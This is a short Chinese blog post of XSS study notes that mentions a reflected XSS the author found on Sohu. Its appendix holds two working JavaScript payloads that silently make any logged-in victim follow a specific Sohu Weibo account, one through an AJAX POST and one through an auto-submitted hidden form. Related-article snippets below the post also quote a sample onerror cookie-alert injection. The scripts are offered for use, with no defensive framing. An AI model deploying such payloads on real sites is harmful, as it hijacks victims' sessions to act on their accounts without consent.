xss漏洞及其他-学习笔记

最新推荐文章于 2024-07-13 21:55:09 发布
最新推荐文章于 2024-07-13 21:55:09 发布
阅读量89 收藏
点赞数
分类专栏: hacker 页面前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcf1987/article/details/84263170
版权

http://www.wooyun.org/bugs/wooyun-2010-010041

这是今天忙活了下的结果。发现了个比较鸡肋的反射型xss

 

另外还学习了sina app的应用,果然比较爽,各种自己的js文件,在线编辑,非常方便。

 

此外下次blog的任务是

http://www.inbreak.net/archives/389

空虚浪子心的blog非常cool

 

 

附录是两个搜狐微博加关注的js脚本

var xmlHttp=null; 

function createXMLHttpRequest() 
{ 
if(xmlHttp == null){
if(window.XMLHttpRequest) {
//Mozilla 浏览器
xmlHttp = new XMLHttpRequest();
}else if(window.ActiveXObject) {
// IE浏览器
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
}
}
}
}
} 

function openAjax() 
{ 
if( xmlHttp == null)
{ 
createXMLHttpRequest(); 
if( xmlHttp == null)
{
//alert('出错');
return ;
}
} 
xmlHttp.onreadystatechange=xmlHttpChange; 

xmlHttp.open("post","/follow/addfollows",true); 
xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");  
xmlHttp.setRequestHeader("X-Requested-With","XMLHttpRequest");  
xmlHttp.send("act=follow&friendids=595824670&type=follow7");
} 

function xmlHttpChange() 
{ 
if(xmlHttp.readyState==4) 
{ 
if(xmlHttp.status==200) 
{ 
  
} 
} 
}  
openAjax();

 

 

传统的js加form提交型

var act = 'follow'; 
//it's icefish冰's weibo
//act=follow&friendids=595824670&type=follow7
var friendids = '595824670'; 
var type='follow7';
           
var sohuAddFollowForm = document.createElement("form");//表单对象   
sohuAddFollowForm.method="post" ;   
sohuAddFollowForm.action = '/follow/addfollows' ;   
       
      var actInput = document.createElement("input") ;  //
      actInput.setAttribute("name", "act") ;   
      actInput.setAttribute("value", act);   
      sohuAddFollowForm.appendChild(actInput) ;   
      
      var friendidsInput = document.createElement("input");// 
      friendidsInput.setAttribute("name","friendids"); 
      friendidsInput.setAttribute("value",friendids); 
      sohuAddFollowForm.appendChild(friendidsInput); 
       
      var typeInput = document.createElement("input");// 
      typeInput.setAttribute("name","type"); 
      typeInput.setAttribute("value",type); 
      sohuAddFollowForm.appendChild(typeInput); 
       
      document.body.appendChild(sohuAddFollowForm) ;   
      sohuAddFollowForm.submit() ;   
      document.body.removeChild(sohuAddFollowForm) ;
 
wcf1987
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jquery XSS漏洞(CVE-2020-11022)
jammny
02-04 2万+
漏洞详情 jQuery是美国John Resig程序员的一套开源、跨浏览器的JavaScript库。 jQuery 大于或等于1.2至3.5.0的版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。即使执行sanitize处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),攻击者可利用该漏洞执行客户端代码。 漏洞影响 V 1.2.0 <= jquery < V 3.5.0 漏洞分析 在html()方
xss跨站脚本攻击-运维安全详细笔记
06-30
* kali机器上搭建搜集cookie网站,访问xss漏洞网站挂马 * 编写搜集cookie的代码,收集用户的cookie信息 这只是xss跨站脚本攻击的一些基本知识点和实践案例,更多的信息和技术细节需要进一步学习和研究。
cookie XSS跨站脚本攻击 localStorage sessionStorage
weixin_45348067的博客
02-13 885
cookie 1、根据域名和路径进行存储 2、只能存储文本信息 3、只存储在指定的位置,不能随意改变位置 4、cookie后来都做了加密隐藏处理,现在无法直接找到cookie文件内容 5、cookie只能做临时存储,如果关闭浏览器,数据将会丢失 在cookie使用中,主要用于前后端不分离,如果前后端分离,使用AJAX发送时是不同的前后端不分离时,cookie会被自动携带发送到服务端,前后端不分离通...
XSS漏洞学习笔记
qq_40096118的博客
04-21 365
XSS 攻击通常利用了 Web 应用程序中的不安全输入验证或者过滤机制,允许攻击者将恶意脚本注入到网页中,进而影响其他用户的浏览器执行该脚本。这可能导致恶意脚本偷取用户的会话 Cookie、窃取敏感信息、修改页面内容、重定向到恶意网站等危险行为,甚至利用浏览器漏洞实现更深层次的攻击。恶意脚本作为 URL 参数或表单数据的一部分发送到服务器端,服务器端将恶意脚本反射回给用户,用户的浏览器执行了这些脚本。当其他用户访问包含恶意脚本的页面时,恶意脚本会从服务器端加载并执行,造成危害。
XSS学习笔记---Pikachu漏洞平台
CyhDl666的博客
01-22 555
文章目录XSS一.XSS概述二.XSS漏洞测试流程三.XSS注入实例3.1反射性XSS3.1.1概述3.1.2攻击实例 XSS 一.XSS概述 XSS是发生在Web前端的漏洞,所以其危害对象主要是前端用户 XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取、甚至可以结合浏览器自身的漏洞对用户主机进行远程控制等 -图片来自i春秋 漏洞形成原因:形成XSS漏洞的主要原因是程序对输入和输出的控制不严格,导致构造的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。 二.XSS
discuzX3.0_存储型xss跨站漏洞-学习笔记
小龙在线
08-17 539
漏洞名称 discuzx3.0 _存储型xss跨站漏洞 发布时间 2014-01-27 漏洞分类 存储型xss漏洞 缺陷代码 没有对网络url地址参数进行过滤。 实验步骤 打开目标站点,发表日志,点选网络图片,输入以下代码http://www.22222.cc/a.gif"onerror=javascript:alert(document.cookie)> 保存链接,并发表日志。 此时如果点击该日志链接会出现弹窗。 分析和思考 xss存储型xss跨站的危害是 盗取各类用户帐号,如机器登录帐号、用户网
discuz7.0 _post.php xss跨站漏洞-学习笔记
小龙在线
08-17 805
漏洞名称 discuz7.0 _post.php xss跨站漏洞 发布时间 2014-06-02 漏洞分类 反射型xss漏洞 缺陷代码 没有对所有参数进行过滤。 if($action == 'reply') { $addfeedcheck = $customaddfeed & 4 ? 'checked="checked"': ''; } elseif(!empty($special) && $action != 'reply') { $addfeedcheck = $
渗透环境安装篇之安装XSS漏洞靶场xss-labs
最新发布
m0_64628473的博客
07-13 304
4、访问http://localhost/xss-labs/教程基础环境:在物理机安装phpstudy。2、将靶场文件解压到WWW目录下。注意:不能嵌套文件夹。3、启动apache。
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 17万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
浅谈XSS简单漏洞xss-labs-master(初级)(1),2024年最新从入门到精通的网络安全进阶学习笔记整理
2401_83974087的博客
04-14 902
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
安装xss-labs ppt手册
10-22
为了学习和研究XSS漏洞XSS-Labs是一个优秀的实践平台,它提供了多种不同类型的XSS挑战,帮助安全从业者提升检测和防御XSS攻击的能力。 **XSS-Labs安装步骤** 1. **下载靶场文件**:首先,你需要找到XSS-Labs的...
Webgoat学习笔记.zip
03-12
【WebGoat学习笔记】 WebGoat是一款由OWASP(开放网络应用安全项目)开发的在线教学平台,专门用于教授和实践网络安全中的Web应用程序漏洞。它是一个故意设计有漏洞的Web应用,帮助学习者了解并熟悉各种攻击手段,...
1026-老师笔记1
08-03
通过审查代码,可以发现潜在的SQL注入、XSS、文件包含和其他安全问题。确保所有用户输入都经过适当的验证和过滤,避免使用不安全的函数,并遵循安全编码最佳实践。 7. 日志分析: 日志分析对于网络安全至关重要,...
xss game挑战笔记.pdf
02-11
### XSS Game挑战笔记知识点概述 #### 一、XSS攻击简介 XSS(Cross Site Scripting)即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。攻击者通过在Web页面中注入恶意脚本代码,当用户浏览该页面时,嵌入其中的...
python 反编译 pyc 一些心得
ice
09-06 2888
0x01 , 现在用python的人也多了起来,代码安全始终是我们要考虑的问题,比如说我们要将我们的成果发布出去,py直接发布肯定是不行的(除非你是开源的),那么我们就只能考虑发布pyc文件了,     0x02,今天讨论的就是怎么反编译pyc到源代码的技术,从道理上来讲,这个是完全没问题的,而且反编译出来的代码质量应该相当高才对(参考java class的原理),在百度里面搜索的话,信息量...
密码字典
ice
02-16 1745
这是我根据前一段各种密码门做的一个密码字典(大概通过3亿多账号统计出来的,当然有重复,也有数据不规整),我给大家放出来一部分高频密码统计  ...
metasploit 图形化界面和自动化exploit脚本
ice
10-21 1687
0x01 最新版的metasploit没了图形化界面,              armitage开始收费              那我们就选用msfgui吧,安装简单                https://raw.github.com/scriptjunkie/msfgui/master/msfgui-installer.exe               下载安装就可以了 ...
ewebeditor 3.8 任意文件上传漏洞解析
ice
11-09 1158
   首先这个是别人早都发出来的一个漏洞,exp也写好了,如下 &lt;title&gt;eWebeditoR3.8 for php任意文件上EXP&lt;/title&gt; &lt;form action="" method=post enctype="multipart/form-data"&gt; &lt;INPUT TYPE="hidden" name="MAX_F
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值